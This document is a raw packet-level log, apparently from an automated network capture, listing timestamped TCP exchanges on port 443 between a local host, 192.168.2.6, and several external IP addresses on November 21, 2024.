Nov 21, 2024 09:53:49.890383959 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.890440941 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.890455961 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.890559912 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.890559912 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.893876076 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.893928051 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.893975019 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.894001007 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.894023895 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.894094944 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.898313046 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.898345947 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.898401976 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.898415089 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.898433924 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.898531914 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.900707960 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.900759935 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.900779963 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.900808096 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.900827885 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.900842905 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.905958891 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.905992985 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.906105995 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.906105995 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.906124115 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.906223059 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.908765078 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.908873081 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.908907890 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.908936977 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.908950090 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.908976078 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.913867950 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.913891077 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.913944006 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.913957119 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.914004087 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.914324999 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.916088104 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.916115999 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.916244030 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.916244030 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.916270018 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.916311979 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.920901060 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.920942068 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.921061993 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.921088934 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.921216011 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.921216011 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.923948050 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.923985004 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.924011946 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.924036980 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.924052954 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.924072981 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.939518929 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.939604998 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.939625978 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.939696074 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.939734936 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.939758062 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.940418005 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.940476894 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.940504074 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.940531015 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.940548897 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.940570116 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.946454048 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.946513891 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.946537971 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.946554899 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.946582079 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.946599007 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.955557108 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.955600977 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.955652952 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.955688000 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.955718994 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.955739021 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.958852053 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.958897114 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.958995104 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.959237099 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.959254026 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.963852882 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.963934898 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.963947058 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.963964939 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.964020967 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.964020967 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.964982986 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.965060949 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.965135098 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.965163946 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.965212107 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.060065031 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.060098886 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.060266018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.060266018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.060281038 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.060338974 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.066943884 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.066975117 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.067019939 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.067025900 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.067065001 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.067091942 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.070339918 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.070372105 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.070415974 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.070453882 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.070462942 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.070759058 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.074990034 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.075018883 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.075196028 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.075196028 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.075202942 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.075624943 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.078178883 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078205109 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078258991 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.078269005 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078336000 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.078362942 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078412056 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.078417063 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078466892 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.078469992 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.078526974 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.079308987 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.079330921 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.083082914 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.083112001 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.083210945 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.083210945 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.083220005 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.083334923 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.090115070 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.090145111 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.090269089 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.090269089 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.090279102 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.090425014 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.099034071 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.099060059 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.099138975 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.099163055 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.099163055 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.099184990 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.099200010 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.099226952 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.099235058 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.099332094 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.100774050 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.100790977 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.142059088 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.142498970 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.142519951 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.143337965 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.143342018 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.183495045 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.184005976 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.184094906 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.184448004 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.184462070 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.237083912 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.237148046 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.237575054 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.237592936 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.237704992 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.237786055 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.237796068 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.238059998 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.238097906 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.238806963 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.238814116 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.365792036 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.366300106 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.366338015 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.366782904 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.366792917 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.371501923 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.371895075 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.371929884 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.372353077 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.372359991 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.590976954 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.591051102 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.591101885 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.591386080 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.591386080 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.591403961 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.591413975 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.594578981 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.594619036 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.594691992 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.594827890 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.594841957 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.626982927 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.627037048 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.627104998 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.627274036 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.627295971 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.627310038 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.627324104 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.630033016 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.630064011 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.630137920 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.630274057 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.630284071 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.684014082 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.684106112 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.684197903 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.684326887 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.684350014 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.684365988 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.684372902 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.687251091 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.687295914 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.687361002 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.687549114 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.687561989 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.821757078 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.821815014 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.821871996 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.823869944 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.823894978 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.823901892 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.823909998 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.825743914 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.825818062 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.825891972 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.826071024 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.826071024 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.826116085 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.826143980 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.829651117 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.829693079 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.829751015 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.830965042 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.830977917 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.831012011 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.831046104 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.831192017 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.831301928 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:50.831322908 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:50.839453936 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.839474916 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.839489937 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.839509010 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.839541912 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.839554071 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:50.839596987 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:50.889566898 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:50.889631987 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:50.892741919 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:50.892749071 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:50.892927885 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:50.892934084 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:50.893075943 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:50.893134117 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.037432909 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.037455082 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.037513018 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.037543058 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.037583113 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.077841997 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.077861071 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.077899933 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.077924013 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.077944040 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.077961922 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.225665092 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.225684881 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.225734949 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.225758076 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.225785971 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.225805044 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.250282049 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.250302076 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.250349998 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.250370026 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.250391006 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.250408888 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.271358967 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.271377087 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.271436930 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.271459103 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.271492004 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.271514893 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.290560007 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.290577888 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.290647984 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.290669918 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.290705919 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.402796984 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:51.402868032 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:51.404678106 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:51.404691935 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:51.404947042 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:51.432003975 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.432080984 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.432115078 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.432157040 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.432177067 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.432199001 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.447284937 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:51.448038101 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.448067904 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.448230028 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.448230982 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.448257923 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.448301077 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.461889029 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.461918116 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.461956978 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.461977959 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.462017059 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.467542887 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:51.478148937 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.478212118 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.478231907 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.478245020 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.478279114 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.478297949 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.480743885 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:51.480856895 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:51.480905056 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.480905056 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.480931997 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:51.480979919 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.480979919 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.480979919 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.482250929 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.482335091 CET	443	49778	20.234.120.54	192.168.2.6
